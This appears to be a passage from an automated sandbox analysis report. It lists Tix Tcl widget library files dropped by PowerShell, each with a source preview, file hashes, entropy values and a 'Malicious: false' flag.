                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DirList.tcl,v 1.5 2004/03/28 02:44:57 hobbs Exp $..#..# DirList.tcl --..#..#.Implements the tixDirList widget...#..# . - overrides the -browsecmd and -command options of the..#. HList subwidget..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixDirList {.. -classname TixDirList.. -superclass tixScrolledHList.. -method {...chdir.. }.. -flag {... -browsecmd -command -dircmd -disablecallback ... -root -rootname -showhidden -value.. }.. -configspec {...{-browsecmd browseCmd BrowseCmd ""}...{-command command Command ""}...{-dircmd dirCmd DirCmd ""}...{-disablecallback disableCallback DisableCallback 0 tixVerifyBoolean}...{-root root Root ""}...{-root
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9322
                                                                                                                                                                                                                      Entropy (8bit):4.9314444400413135
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:4W5KqDhd1lhK5NpMMiuwPukVV5q5/XmB7S:4uKqDhd1zKPpMMiDP3KfmhS
                                                                                                                                                                                                                      MD5:7FA4ECE275E44A66B7A68AD32F0C5CE1
                                                                                                                                                                                                                      SHA1:430561A54B855EE466972EDF615F0266D3678A4C
                                                                                                                                                                                                                      SHA-256:FADEC5D82AB5755F5A9461E5C6EB9D5A2A6CAC4D5AA7BF6E70AC0989CDF9E30F
                                                                                                                                                                                                                      SHA-512:53454A87A88ED1C174D4BF659FE9340D21455453D9F824ACC36D11842CA252A5D3056E91AB78C368F572BE457E6D39867CE1A77EBD0853B65F7A5BCFAE033E3F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DirTree.tcl,v 1.4 2004/03/28 02:44:57 hobbs Exp $..#..# DirTree.tcl --..#..#.Implements directory tree for Unix file systems..#..# What the indicators mean:..#..#.(+): There are some subdirectories in this directory which are not..#. currently visible...#.(-): This directory has some subdirectories and they are all visible..#..# none: The dir has no subdirectori(es)...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....##..## The tixDirTree require special FS handling due to it's limited..## separator idea (instead of real tree)...##....tixWidgetClass tixDirTree {.. -classname TixDirTree.. -superclass tixVTree.. -method {...activate chdir refresh.. }.. -flag {..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4191
                                                                                                                                                                                                                      Entropy (8bit):4.743369459252691
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RL/PZDCvkn+4X/fHfHrx8Toja82ldW94N22TG28YZStbE1iMrRJsYlsM6Tef8:F564X/fHfHrx8k+W+2Vo/RQU8
                                                                                                                                                                                                                      MD5:FAC63497F7F43F8458CFED9B9FFD9FE2
                                                                                                                                                                                                                      SHA1:50F340CD15D6A0F52D50DDFAA3748D24B6809191
                                                                                                                                                                                                                      SHA-256:3EB7EAEFE9E626DDF9F13FF022A325BCAAD3433ADCF0528D076A89D3C93B6B3D
                                                                                                                                                                                                                      SHA-512:65C23AEEB989FF02DA1B3BD7599A3A28378F7EF83479B3BDCF25B94E2297900750B40BE259FF9483C7E5888B318C3D9BC84BA8E4E6A731870FB2584754F0BED6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DragDrop.tcl,v 1.4 2001/12/09 05:04:02 idiscovery Exp $..#..# DragDrop.tcl ---..#..#.Implements drag+drop for Tix widgets...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixClass tixDragDropContext {.. -superclass {}.. -classname TixDragDropContext.. -method {...cget configure drag drop set startdrag.. }.. -flag {...-command -source.. }.. -configspec {...{-command ""}...{-source ""}.. }..}....proc tixDragDropContext:Constructor {w} {.. upvar #0 $w data..}....#----------------------------------------------------------------------..# Private methods..#..#----------------------------------------------------------------------..proc tixDragDropContext:CallCommand {w target command X Y} {.. upv
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1051
                                                                                                                                                                                                                      Entropy (8bit):5.179912937750368
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:RLuxNnOusaEEzB0tsbbHnf5VNHaeYF9xc2MavXWvujM3+90aoinMIXmMHydkgIOH:RLu2usa70tsbNvkyVBIWky5fqs1LJx
                                                                                                                                                                                                                      MD5:17A9C85301CBDC6869D75C19E9A87954
                                                                                                                                                                                                                      SHA1:9E2936C823E1E1F484EC444C03FD5E5D6ABEEA9D
                                                                                                                                                                                                                      SHA-256:4173DB98595ABF7AD6082192E147D21274F6D6D240F97A32B229AA573849BB1E
                                                                                                                                                                                                                      SHA-512:68876F675C4B4DB69976C2E2BF9A459D827FF23424F710CDB2489364F192FDD30B06613EA3AF7BA15332A95E7EB49EB53E78DAC73C17BFF5FD4959DB33442060
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: DtlList.tcl,v 1.2 2001/12/09 05:04:02 idiscovery Exp $..#..# DtlList.tcl --..#..#.This file implements DetailList widgets..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixDetailList {.. -classname TixDetailList.. -superclass tixScrolledGrid.. -method {.. }.. -flag {...-hdrbackground.. }.. -configspec {...{-hdrbackground hdrBackground HdrBackground #606060}.. }.. -alias {...{-hdrbg -hdrbackground}.. }.. -default {...{*grid.topMargin..1}...{*grid.leftMargin..0}.. }..}......proc tixDetailList:FormatCmd {w area x1 y1 x2 y2} {.. upvar #0 $w data.... case $area {...main {...}...default {... $data(w:grid) format border $x1 $y1 $x2 $y2 \....-filled 1 \....-relief rai
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11826
                                                                                                                                                                                                                      Entropy (8bit):5.029842133235277
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:66jXz0XVT+3Z9QGkM85b0MoMJ2fbYSRPsLGMhxXb6FNGNxyIUiYM4Jifnlib:3jXAVTySwfbYS9si7DGNxyFWfcb
                                                                                                                                                                                                                      MD5:5EA85B025A11010D9DE2CB37DD7A01D9
                                                                                                                                                                                                                      SHA1:07F1E483EA1F6246AD875BCF82C70D5C930901FE
                                                                                                                                                                                                                      SHA-256:26BEC1EB5D705E17F4700E0889EC902417B50DEC5A9570E5225216D413D0D115
                                                                                                                                                                                                                      SHA-512:2888BE46C68F6045245B4C33BE066EF111E62DF8F6C403FD6911F61FC5DC8F2BB6C8117743AEDF8221078E8A18109B595A7D6EC5B37A2C44D9D71128FAE10D77
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: EFileBox.tcl,v 1.5 2004/03/28 02:44:57 hobbs Exp $..#..# EFileBox.tcl --..#..#.Implements the Extended File Selection Box widget...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#......#..# ToDo..# (1).If user has entered an invalid directory, give an error dialog..#....tixWidgetClass tixExFileSelectBox {.. -classname TixExFileSelectBox.. -superclass tixPrimitive.. -method {...filter invoke.. }.. -flag {...-browsecmd -command -dialog -dir -dircmd -directory ...-disablecallback -filetypes -pattern -selection -showhidden -value.. }.. -forcecall {...-filetypes.. }.. -configspec {...{-browsecmd browseCmd BrowseCmd ""}...{-command command Command ""}...{-dialog dialog
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1783
                                                                                                                                                                                                                      Entropy (8bit):5.23250045374523
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RL4rkKvkL40uMVYp1tBJl3D0YNTCm3jaOR:F4rkD40uZ1FlwYN7
                                                                                                                                                                                                                      MD5:D197A070074227CB1CD074EF8C3A52A2
                                                                                                                                                                                                                      SHA1:64ED80F301D92EA133E8D0784A273FD63BE4ED3E
                                                                                                                                                                                                                      SHA-256:E52A51A4DFA9ECEA0B57010407EF5584363D947D6EAF417E1FF404876050372A
                                                                                                                                                                                                                      SHA-512:ED8C81FC380DC974FE845715064C12D612129A93789B5972A341AB3C9F5D1966E2BEBE94E84CBDC77F79444F0C132E6318E009FD4E659E74F8FD3CD8019616AB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: EFileDlg.tcl,v 1.3 2002/01/24 09:13:58 idiscovery Exp $..#..# EFileDlg.tcl --..#..#.Implements the Extended File Selection Dialog widget...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....foreach fun {tkButtonInvoke} {.. if {![llength [info commands $fun]]} {...tk::unsupported::ExposePrivateCommand $fun.. }..}..unset fun....tixWidgetClass tixExFileSelectDialog {.. -classname TixExFileSelectDialog.. -superclass tixDialogShell.. -method {}.. -flag {...-command.. }.. -configspec {...{-command command Command ""}.....{-title title Title "Select A File"}.. }..}....proc tixExFileSelectDialog:ConstructWidget {w} {.. upvar #0 $w data.... tixChainMethod $w ConstructWidget.. set data(w:fsbox) [
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5448
                                                                                                                                                                                                                      Entropy (8bit):5.07381842866554
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:FE4X+p/TvIIQfULkw2kPRmzTARE3kOWn4uNKnLesSEGOfEGcZsOl2L6O6ORu:nX+pbvITfUowjmzTARE3FWn/aL4EbfE1
                                                                                                                                                                                                                      MD5:F71417FF2660A4F3B7E2963A62B8EF2B
                                                                                                                                                                                                                      SHA1:34405C4065D466C2457229CD99893E447145AAE8
                                                                                                                                                                                                                      SHA-256:9519AF49109264B006305ECE5F6847F1E7B82E6F88812174D1D7BE6D8E00DB9E
                                                                                                                                                                                                                      SHA-512:94721A920C2836270A8FE9C7ADBC384A84BC8D8BC1FFE619D7E456CA5C5E6BE15844491F0FE9BAD4E764DDE21117CBDA5AB005835CEA98D5D4799947CB677DAF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Event.tcl,v 1.6 2004/04/09 21:37:01 hobbs Exp $..#..# Event.tcl --..#..#.Handles the event bindings of the -command and -browsecmd options..#.(and various of others such as -validatecmd)...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#----------------------------------------------------------------------..# Evaluate high-level bindings (-command, -browsecmd, etc):..# with % subsitution or without (compatibility mode)..#..#..# BUG : if a -command is intercepted by a hook, the hook must use..# the same record name as the issuer of the -command. For the time..#.being, you must use the name "bind" as the record name!!!!!..#..#---------------------------------------------------------
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14904
                                                                                                                                                                                                                      Entropy (8bit):4.962220617015241
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:FAzrmNf7MzDeSLtbZWjTSo/lUcR/C8z1fLZc:FA8DsmjTTm81lc
                                                                                                                                                                                                                      MD5:B34056D79F7B9C9E9CF8B471E4D1E421
                                                                                                                                                                                                                      SHA1:719A0315F19EE35D8B0440D4AE655E92AB5DBA1F
                                                                                                                                                                                                                      SHA-256:B7C9C936E2CF490272A9B0F821C36CB3BB58F251B428E74C071CEA9B31A1B726
                                                                                                                                                                                                                      SHA-512:E9DE41CF5B944D54D149A931019CEBDEC94BC421B90572CD9EAB67049F1578377B300FDA2A8E9117FA60CB14F5BF2125219D7D7D1406017015921B4A7EBF82D6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: FileBox.tcl,v 1.5 2004/03/28 02:44:57 hobbs Exp $..#..# FileBox.tcl --..#..#.Implements the File Selection Box widget...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#......# ToDo..# (1).If user has entered an invalid directory, give an error dialog..#....tixWidgetClass tixFileSelectBox {.. -superclass tixPrimitive.. -classname TixFileSelectBox.. -method {...filter invoke.. }.. -flag {...-browsecmd -command -dir -directory -disablecallback...-grab -pattern -selection -value.. }.. -configspec {...{-browsecmd browseCmd BrowseCmd ""}...{-command command Command ""}...{-directory directory Directory ""}...{-disablecallback disableCallback DisableCallback 0 tixVerifyBoole
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2591
                                                                                                                                                                                                                      Entropy (8bit):5.10257693625491
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RL/Bj79akhkmn1gZ+DfWaekCfTG2wwBpEIsG2e:F/KYwEe5T/wwById2e
                                                                                                                                                                                                                      MD5:4D7AA1B8DE59F0B3A4E746144A75FE78
                                                                                                                                                                                                                      SHA1:0F6A5FDE0509879BD98536A1066E5E089717F272
                                                                                                                                                                                                                      SHA-256:6C00108D75EF779467551DAD23E141A7A670050D3320D4765D1B0B56A8573258
                                                                                                                                                                                                                      SHA-512:4027AE56E52614EBB701B6960E11B6B0358B6E27B19BA1ED6E0D7618159EC7725427B44E8851F8A3BE983B2A3F782ACD9F12BF7F3A58F6625614833530A4D8BA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: FileCbx.tcl,v 1.5 2004/03/28 02:44:57 hobbs Exp $..#..# tixFileCombobox --..#..#.A combobox widget for entering file names, directory names, file..#.patterns, etc...#..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....# tixFileComboBox displays and accepts the DOS pathnames only. It doesn't..# recognize UNC file names or Tix VPATHS...#..tixWidgetClass tixFileComboBox {.. -classname TixFileComboBox.. -superclass tixPrimitive.. -method {...invoke.. }.. -flag {...-command -defaultfile -directory -text.. }.. -forcecall {...-directory.. }.. -configspec {...{-defaultfile defaultFile DefaultFile ""}...{-directory directory Directory ""}...{-command command Command ""}...{-
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2260
                                                                                                                                                                                                                      Entropy (8bit):5.172746366164595
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RLAylKvkLKkHcDHJgbDZgGkZgdgZgk0+ROk/69yuS6HFuW:FDlD2+VjAjtdk1FuW
                                                                                                                                                                                                                      MD5:CBA950AC3F788DDA23FC3885AD812E42
                                                                                                                                                                                                                      SHA1:C7A167C94CCDD6F637CBCC7FB9CDEAFA3748FE74
                                                                                                                                                                                                                      SHA-256:4BA9F99F0074B1E26A36B1DCEE801850B795B422BC6716467D92A80DBC17A2B5
                                                                                                                                                                                                                      SHA-512:07D9242DC1FB42077DD3A0F206C71F7805B1E08719B29E99E8FC1B01D9B4069CA2A7D44599BAB1243EB980481C4E6D22A6741C5BFAAE682276B3942E921FD228
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: FileDlg.tcl,v 1.3 2001/12/09 05:04:02 idiscovery Exp $..#..# FileDlg.tcl --..#..#.Implements the File Selection Dialog widget...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixFileSelectDialog {.. -classname TixFileSelectDialog.. -superclass tixStdDialogShell.. -method {.. }.. -flag {...-command.. }.. -configspec {...{-command command Command ""}.....{-title title Title "Select A File"}.. }..}....proc tixFileSelectDialog:ConstructTopFrame {w frame} {.. upvar #0 $w data.... tixChainMethod $w ConstructTopFrame $frame.... set data(w:fsbox) [tixFileSelectBox $frame.fsbox \...-command [list tixFileSelectDialog:Invoke $w]].. pack $data(w:fsbox) -expand yes -fill both..}....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7589
                                                                                                                                                                                                                      Entropy (8bit):5.0047732002396135
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:yjjXEkBAOJ6VvLXBqg/7CcXez7VrT5HOj:jIIpdn4XHOj
                                                                                                                                                                                                                      MD5:C884AD11E5CB79B32ADA9F381F51BF78
                                                                                                                                                                                                                      SHA1:49A91D93C39DC0A50E60A3AE6E0753F7E2DF0152
                                                                                                                                                                                                                      SHA-256:29DD4C57EC57052045DF06245AB582522A4E55EEED69036E9288E9C208E84B9F
                                                                                                                                                                                                                      SHA-512:B77965B77B1EB962CA7E15CD4BB2BEC5D0089B5EC262C91EDC5F908C885BBA46219FF745EE665F2B1530F5B3D9817B6018E92E3ADDF282374E38DB231C6B0595
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: FileEnt.tcl,v 1.7 2004/03/28 02:44:57 hobbs Exp $..#..# FileEnt.tcl --..#..# .TixFileEntry Widget: an entry box for entering filenames...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixFileEntry {.. -classname TixFileEntry.. -superclass tixLabelWidget.. -method {...invoke filedialog update.. }.. -flag {...-activatecmd -command -dialogtype -disablecallback -disabledforeground...-filebitmap -selectmode -state -validatecmd -value -variable.. }.. -forcecall {...-variable.. }.. -static {...-filebitmap.. }.. -configspec {...{-activatecmd activateCmd ActivateCmd ""}...{-command command Command ""}...{-dialogtype dialogType DialogType ""}...{-di
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3308
                                                                                                                                                                                                                      Entropy (8bit):4.805726338790687
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RLjMj0ghkLa5hDTqWufrYMYTR/Z8gy2nVO52Z6vW2wwIwq:FDZ0lTRGg7VO526vPwwIwq
                                                                                                                                                                                                                      MD5:749C02E4BA1F8602C1793D1ABAA40ADC
                                                                                                                                                                                                                      SHA1:160BFD7D88A0522671398CEE07B8FA1AEE8B81A6
                                                                                                                                                                                                                      SHA-256:1D042097DBE2A3B8940BACB8BB5F5746E52BB2CB224441859FEA9D5A4BBC0074
                                                                                                                                                                                                                      SHA-512:4917B5CDD56DE17C425B37EDEF0BF75F7204D8DC4AA97DCF5FB6DCC09173F52C223C9ED008DF41B791444BAE13846AC5906A5AA6013D022566D1ACC9245E59F5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: FloatEnt.tcl,v 1.4 2004/03/28 02:44:57 hobbs Exp $..#..# FloatEnt.tcl --..#..#.An entry widget that can be attached on top of any widget to..#.provide dynamic editing. It is used to provide dynamic editing..#.for the tixGrid widget, among other things...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixFloatEntry {.. -classname TixFloatEntry.. -superclass tixPrimitive.. -method {...invoke post unpost.. }.. -flag {...-command -value.. }.. -configspec {...{-value value Value ""}...{-command command Command ""}.. }.. -default {...{.entry.highlightThickness.0}.. }..}....#----------------------------------------------------------------------..#..#
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22787
                                                                                                                                                                                                                      Entropy (8bit):4.893133811240903
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:bmqK80wxCWqmvjUi0kULcN5XMeR4hXEPn/Nwh8Vtjs:yT8RXMeR4hXEPKgjs
                                                                                                                                                                                                                      MD5:22BA8D485FD4624F5FB6EF1AC8902DFA
                                                                                                                                                                                                                      SHA1:D1BDF4985D43C2CCB8D9B62007A961D83A144687
                                                                                                                                                                                                                      SHA-256:BF9DD6AF9FEB5F50C9C47766263D6A11E8780DD78644892518A4B7C8DFBFE412
                                                                                                                                                                                                                      SHA-512:CC13BB78FDD3D29D5E64C1DC12DABF98DA27BB286481DF4F6503C0EEEF04A155AF38168A4E517A4E3269713EC39DD9B6C6D44CD5C9742938DF006235076C4BC2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Grid.tcl,v 1.6 2004/03/28 02:44:57 hobbs Exp $..#..# Grid.tcl --..#..# .This file defines the default bindings for Tix Grid widgets...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#......global tkPriv..if {![llength [info globals tkPriv]]} {.. tk::unsupported::ExposePrivateVariable tkPriv..}..#--------------------------------------------------------------------------..# tkPriv elements used in this file:..#..# afterId -..Token returned by "after" for autoscanning...# fakeRelease -..Cancel the ButtonRelease-1 after the user double click..#--------------------------------------------------------------------------..#..foreach fun {tkCancelRepeat} {.. if {![llength [info commands $fun]]}
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):19065
                                                                                                                                                                                                                      Entropy (8bit):4.929401700790276
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:XJmqeEm+tF8PfAerlxkfAArlxYGRm5KkmrbjjwGgLspFDKYPA3CoiboTwH4lfZcD:ZmqZ8UiBqTSFiboMH4lfZcDc/FCj
                                                                                                                                                                                                                      MD5:48702E934B2A87993A717EE5902833C8
                                                                                                                                                                                                                      SHA1:87066C6435F013394DEF63438AD2E80B3D0F5D4F
                                                                                                                                                                                                                      SHA-256:913020628F9116A78AFD4F615F7EB707511A489499B4BFBFAF6EED76A052A3FA
                                                                                                                                                                                                                      SHA-512:9AE5DD6E57659469020BA741431F4C8DAFB9DD03C02FB18821F8169E2F49CC29155B288BEA3437E1976411E29A8AC5EF13774A93ADB714219E3D795A24731AB4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: HList.tcl,v 1.6 2004/03/28 02:44:57 hobbs Exp $..#..# HList.tcl --..#..#.This file defines the default bindings for Tix Hierarchical Listbox..#.widgets...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....global tkPriv..if {![llength [info globals tkPriv]]} {.. tk::unsupported::ExposePrivateVariable tkPriv..}..#--------------------------------------------------------------------------..# tkPriv elements used in this file:..#..# afterId -..Token returned by "after" for autoscanning...# fakeRelease -..Cancel the ButtonRelease-1 after the user double click..#--------------------------------------------------------------------------..#..foreach fun {tkCancelRepeat} {.. if {![llength [info
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4704
                                                                                                                                                                                                                      Entropy (8bit):4.987585326841583
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RLtnXQwoKvk6OQeXD41I0xNnrSyBCMvQlzYyB/9t6TwCuo549o54obD5ek50WU58:FSPyOXqrGS768T1FpSpVPM8Lg
                                                                                                                                                                                                                      MD5:0E4DB710D772AF0492C7CA8D9C3EBA9F
                                                                                                                                                                                                                      SHA1:2B508C0587868DC05A104CCA568C1101F9A1680F
                                                                                                                                                                                                                      SHA-256:C3E2AFAE1E4D072934C8EE5EC2D6FFF8A07515026A82122569B709915EDEAA67
                                                                                                                                                                                                                      SHA-512:97874339AB6519D1EA2CF9E3888D23502BCC1BC7627467D073E6BC1B3552124996E4BD5DDEAC5897D68D69C01BE89E9AD3E51A9DD987A961D115857E51F8CF93
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: HListDD.tcl,v 1.3 2001/12/09 05:04:02 idiscovery Exp $..#..# HListDD.tcl --..#..#.!!! PRE-ALPHA CODE, NOT USED, DON'T USE !!!..#..#.This file implements drag+drop for HList...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#..# events..#..#....proc tixHListSingle:DragTimer {w ent} {.. case [tixHListSingle:GetState $w] {...{1} {... # fire up...}.. }..}............#----------------------------------------------------------------------..#..#.. Drag + Drop Bindings..#..#----------------------------------------------------------------------..... #----------------------------------------#... #. Sending Actions. #... #----------------------------------------#....#---------------------------
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6382
                                                                                                                                                                                                                      Entropy (8bit):5.030487933293997
